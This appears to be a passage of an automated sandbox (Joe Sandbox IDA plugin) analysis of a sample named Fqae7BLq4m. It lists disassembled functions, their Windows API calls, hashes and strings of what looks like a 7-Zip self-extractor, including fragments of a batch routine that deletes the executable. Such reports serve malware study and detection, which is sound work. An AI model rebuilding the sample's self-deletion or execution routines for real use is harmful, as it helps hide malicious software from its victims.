                                                                • CloseHandle.KERNEL32(004177C4), ref: 00404C40
                                                                • SetFileAttributesW.KERNEL32(00406437,00000000), ref: 00404C57
                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00404C69
                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C72
                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C7E
                                                                • ??3@YAXPAX@Z.MSVCRT(00406437,?), ref: 00404C84
                                                                • ??3@YAXPAX@Z.MSVCRT(00406437,?,?,?,?,?,?,?,?,?,?,?,?,?,00406437,004177C4), ref: 00404CB2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                                                • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                                                • API String ID: 3007203151-3467708659
                                                                • Opcode ID: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                                                                • Instruction ID: 7a4c4b622d76ac6c1822c64a370ea4e05d699ec4102568342bfcf68b8c9639ad
                                                                • Opcode Fuzzy Hash: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                                                                • Instruction Fuzzy Hash: DE416171D01119BADB00EBA5ED85DEEBB78EF44358F50803AF511720E1EB78AE85CB58
                                                                APIs
                                                                • lstrcmpiW.KERNEL32(00000000,0041442C,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004046DF
                                                                  • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                  • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                                                  • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                  • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                                                  • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                  • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                  • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                                                  • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                  • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                  • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                                                  • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                  • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                  • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                • _wtol.MSVCRT ref: 004047DC
                                                                • _wtol.MSVCRT ref: 004047F8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                                                • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle$|wA
                                                                • API String ID: 2725485552-3187639848
                                                                • Opcode ID: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                                                • Instruction ID: a5d789275b7dd46d140941e9fd319bf554fc7ea6ad5da08365fcb0f0a182a74d
                                                                • Opcode Fuzzy Hash: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                                                • Instruction Fuzzy Hash: 4251B5F1A402047EDB10BB619D86EFF36ACDA85308B64443BF904F32C1E6BC5E854A6D
                                                                APIs
                                                                • GetClassNameA.USER32(?,?,00000040), ref: 00402DD3
                                                                • lstrcmpiA.KERNEL32(?,STATIC), ref: 00402DE6
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00402DF3
                                                                  • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                  • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                  • Part of subcall function 00401A85: CharUpperW.USER32(?,76B0E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                  • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402E20
                                                                • GetParent.USER32(?), ref: 00402E2E
                                                                • LoadLibraryA.KERNEL32(riched20), ref: 00402E42
                                                                • GetMenu.USER32(?), ref: 00402E55
                                                                • SetThreadLocale.KERNEL32(00000419), ref: 00402E62
                                                                • CreateWindowExW.USER32(00000000,RichEdit20W,0041335C,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 00402E92
                                                                • DestroyWindow.USER32(?), ref: 00402EA3
                                                                • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00402EB8
                                                                • GetSysColor.USER32(0000000F), ref: 00402EBC
                                                                • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00402ECA
                                                                • SendMessageW.USER32(00000000,00000461,?,?), ref: 00402EF5
                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402EFA
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402F02
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: Window$??3@MessageSend$CharTextUpper$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                                                • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                                • API String ID: 1731037045-2281146334
                                                                • Opcode ID: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                                                • Instruction ID: c7c9ca1f65d7473fe19c29f8272bdbb18bb8b251efb89c9ee4785ec66c96c850
                                                                • Opcode Fuzzy Hash: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                                                • Instruction Fuzzy Hash: FE316072A40119BFDB01AFA5DD49DEF7BBCEF08745F104036F601B21D1DA789A008B68
                                                                APIs
                                                                • GetWindowDC.USER32(00000000), ref: 00401CD4
                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                                                • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                                                • GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                                                • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                                                • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                                                • CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                                                • CreateCompatibleDC.GDI32(?), ref: 00401D52
                                                                • SelectObject.GDI32(00000000,?), ref: 00401D60
                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                                                • SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                                                • GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                                                • SelectObject.GDI32(00000000,?), ref: 00401DB3
                                                                • SelectObject.GDI32(00000000,?), ref: 00401DB9
                                                                • DeleteDC.GDI32(00000000), ref: 00401DC2
                                                                • DeleteDC.GDI32(00000000), ref: 00401DC5
                                                                • ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                                                • ReleaseDC.USER32(00000000,?), ref: 00401DDB
                                                                • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401DE8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                                • String ID:
                                                                • API String ID: 3462224810-0
                                                                • Opcode ID: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                                                • Instruction ID: 24730f8ff9b6a3f8d7f0600a39c6f646a54ca28d21b12e05547a6914d757f366
                                                                • Opcode Fuzzy Hash: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                                                • Instruction Fuzzy Hash: 00313976D00208BBDF215FA19C48EEFBFBDEB48752F108066F604B21A0C6758A50EB64
                                                                APIs
                                                                • GetClassNameA.USER32(?,?,00000040), ref: 00401E05
                                                                • lstrcmpiA.KERNEL32(?,STATIC), ref: 00401E1C
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00401E2F
                                                                • GetMenu.USER32(?), ref: 00401E44
                                                                  • Part of subcall function 00401BDF: GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                                                  • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                                                  • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                                                  • Part of subcall function 00401BDF: SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                                                  • Part of subcall function 00401BDF: LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                                                  • Part of subcall function 00401BDF: LockResource.KERNEL32(00000000), ref: 00401C41
                                                                • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00401E76
                                                                • memcpy.MSVCRT(00000000,00000000,00000010), ref: 00401E83
                                                                • CoInitialize.OLE32(00000000), ref: 00401E8C
                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00401E98
                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00414C14,?), ref: 00401EBD
                                                                • GlobalFree.KERNEL32(00000000), ref: 00401ECD
                                                                  • Part of subcall function 00401CC8: GetWindowDC.USER32(00000000), ref: 00401CD4
                                                                  • Part of subcall function 00401CC8: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                                                  • Part of subcall function 00401CC8: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                                                  • Part of subcall function 00401CC8: GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                                                  • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                                                  • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                                                  • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                                                  • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D52
                                                                  • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401D60
                                                                  • Part of subcall function 00401CC8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                                                  • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                                                  • Part of subcall function 00401CC8: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                                                  • Part of subcall function 00401CC8: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                                                  • Part of subcall function 00401CC8: GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                                                  • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB3
                                                                  • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB9
                                                                  • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC2
                                                                  • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC5
                                                                  • Part of subcall function 00401CC8: ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 00401EFF
                                                                • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 00401F13
                                                                • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00401F25
                                                                • GlobalFree.KERNEL32(00000000), ref: 00401F3A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                                                • String ID: IMAGES$STATIC
                                                                • API String ID: 4202116410-1168396491
                                                                • Opcode ID: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                                                • Instruction ID: 08c73d75f8249df6a552952f3d33af28cabbedea74541c6d0cfd8ce2793c0c4e
                                                                • Opcode Fuzzy Hash: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                                                • Instruction Fuzzy Hash: C7417C71A00218BFCB11DFA1DC49DEEBF7DEF08742B008076FA05A61A0DB758A41DB68
                                                                APIs
                                                                  • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                  • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                • GetDlgItem.USER32(?,000004B8), ref: 0040816A
                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408179
                                                                • GetDlgItem.USER32(?,000004B5), ref: 004081C0
                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 004081C5
                                                                • GetDlgItem.USER32(?,000004B5), ref: 004081D5
                                                                • SetWindowLongW.USER32(00000000), ref: 004081D8
                                                                • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004081FE
                                                                • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408210
                                                                • GetDlgItem.USER32(?,000004B4), ref: 0040821A
                                                                • SetFocus.USER32(00000000), ref: 0040821D
                                                                • SetTimer.USER32(?,00000001,00000000,00000000), ref: 0040824C
                                                                • CoCreateInstance.OLE32(00414C34,00000000,00000001,00414808,00000000), ref: 00408277
                                                                • GetDlgItem.USER32(?,00000002), ref: 00408294
                                                                • IsWindow.USER32(00000000), ref: 00408297
                                                                • GetDlgItem.USER32(?,00000002), ref: 004082A7
                                                                • EnableWindow.USER32(00000000), ref: 004082AA
                                                                • GetDlgItem.USER32(?,000004B5), ref: 004082BE
                                                                • ShowWindow.USER32(00000000), ref: 004082C1
                                                                  • Part of subcall function 00407134: GetDlgItem.USER32(?,000004B6), ref: 00407142
                                                                  • Part of subcall function 00407B33: GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                                                  • Part of subcall function 00407B33: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                                                  • Part of subcall function 00407B33: wsprintfW.USER32 ref: 00407BBB
                                                                  • Part of subcall function 00407B33: ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                                                  • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                  • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                                                  • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                  • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                  • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                  • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                                                  • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                  • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                  • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                                                  • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: Item$Window$MessageSend$System$EnableHandleLoadLongMenuMetricsModuleShow$??3@CreateFocusIconImageInstanceTimerwsprintf
                                                                • String ID:
                                                                • API String ID: 1309318444-0
                                                                • Opcode ID: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                                                • Instruction ID: 3ce0214ef3d03b0ee840dd4ab9c121ae631e901bc0d6870238ad5b6e85178a64
                                                                • Opcode Fuzzy Hash: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                                                • Instruction Fuzzy Hash: 014174B0644748ABDA206F65DD49F5B7BADEB40B05F00847DF552A62E1CB79B800CA1C
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,hAA,00000000), ref: 004030F6
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,hAA,00000000), ref: 004030FE
                                                                • strncmp.MSVCRT ref: 004031F1
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00403255
                                                                • lstrcmpW.KERNEL32(?,SetEnvironment,00000000), ref: 00403273
                                                                • ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@$lstrcmpstrncmp
                                                                • String ID: GUIFlags$MiscFlags$SetEnvironment$hAA${\rtf
                                                                • API String ID: 2881732429-172299233
                                                                • Opcode ID: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                                                • Instruction ID: da55d09168dcf28f6e950782b6654b171f18f9ca5632fa18d2c46afc5d57570a
                                                                • Opcode Fuzzy Hash: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                                                • Instruction Fuzzy Hash: 23819D31900218ABDF11DFA1CD55BEE7B78AF14305F1040ABE8017B2E6DB78AB05DB59
                                                                APIs
                                                                • GetDlgItem.USER32(?,000004B3), ref: 00406A69
                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00406A6E
                                                                • GetDlgItem.USER32(?,000004B4), ref: 00406AA5
                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00406AAA
                                                                • GetSystemMetrics.USER32(00000010), ref: 00406B0B
                                                                • GetSystemMetrics.USER32(00000011), ref: 00406B11
                                                                • GetSystemMetrics.USER32(00000008), ref: 00406B18
                                                                • GetSystemMetrics.USER32(00000007), ref: 00406B1F
                                                                • GetParent.USER32(?), ref: 00406B43
                                                                • GetClientRect.USER32(00000000,?), ref: 00406B55
                                                                • ClientToScreen.USER32(?,?), ref: 00406B68
                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00406BCE
                                                                • GetClientRect.USER32(?,?), ref: 00406C55
                                                                • ClientToScreen.USER32(?,?), ref: 00406B71
                                                                  • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                                                • GetSystemMetrics.USER32(00000008), ref: 00406CD6
                                                                • GetSystemMetrics.USER32(00000007), ref: 00406CDD
                                                                  • Part of subcall function 00406A18: GetDlgItem.USER32(?,?), ref: 00406A36
                                                                  • Part of subcall function 00406A18: SetWindowPos.USER32(00000000), ref: 00406A3D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                                                • String ID:
                                                                • API String ID: 747815384-0
                                                                • Opcode ID: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                                                • Instruction ID: 701d8c843d4ec3579feae24e97f284edc15b0bac0439a5efdbaa5111af673c9b
                                                                • Opcode Fuzzy Hash: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                                                • Instruction Fuzzy Hash: 7B912D71A00209AFDB14DFB9CD85AEEB7F9EF48704F148529E642F6290D778E9008B64
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                • LoadIconW.USER32(00000000), ref: 00407D33
                                                                • GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                • GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                • LoadImageW.USER32(00000000), ref: 00407D54
                                                                • SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                • SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                • GetWindow.USER32(?,00000005), ref: 00407E76
                                                                • GetWindow.USER32(?,00000005), ref: 00407E92
                                                                • GetWindow.USER32(?,00000005), ref: 00407EAA
                                                                • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,0040803E), ref: 00407F0A
                                                                • LoadIconW.USER32(00000000), ref: 00407F0D
                                                                • GetDlgItem.USER32(?,000004B1), ref: 00407F28
                                                                • SendMessageW.USER32(00000000), ref: 00407F2F
                                                                  • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                                                  • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                                                  • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                  • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: Window$HandleItemLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                                                • String ID:
                                                                • API String ID: 1889686859-0
                                                                • Opcode ID: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                                                                • Instruction ID: b6a50195b8a608de49edc5b96f3e83ee8a9b90890169e94b1220211b89b9884f
                                                                • Opcode Fuzzy Hash: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                                                                • Instruction Fuzzy Hash: E861D47064C7096AE9257B61DC4AF3B3699AB40B05F10447FF642B92D2DBBCBC0056AF
                                                                APIs
                                                                • GetParent.USER32(?), ref: 00406F45
                                                                • GetWindowLongW.USER32(00000000), ref: 00406F4C
                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 00406F62
                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 00406F7F
                                                                • GetSystemMetrics.USER32(00000031), ref: 00406F91
                                                                • GetSystemMetrics.USER32(00000032), ref: 00406F98
                                                                • GetWindowDC.USER32(?), ref: 00406FAA
                                                                • GetWindowRect.USER32(?,?), ref: 00406FB7
                                                                • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00406FEB
                                                                • ReleaseDC.USER32(?,00000000), ref: 00406FF3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
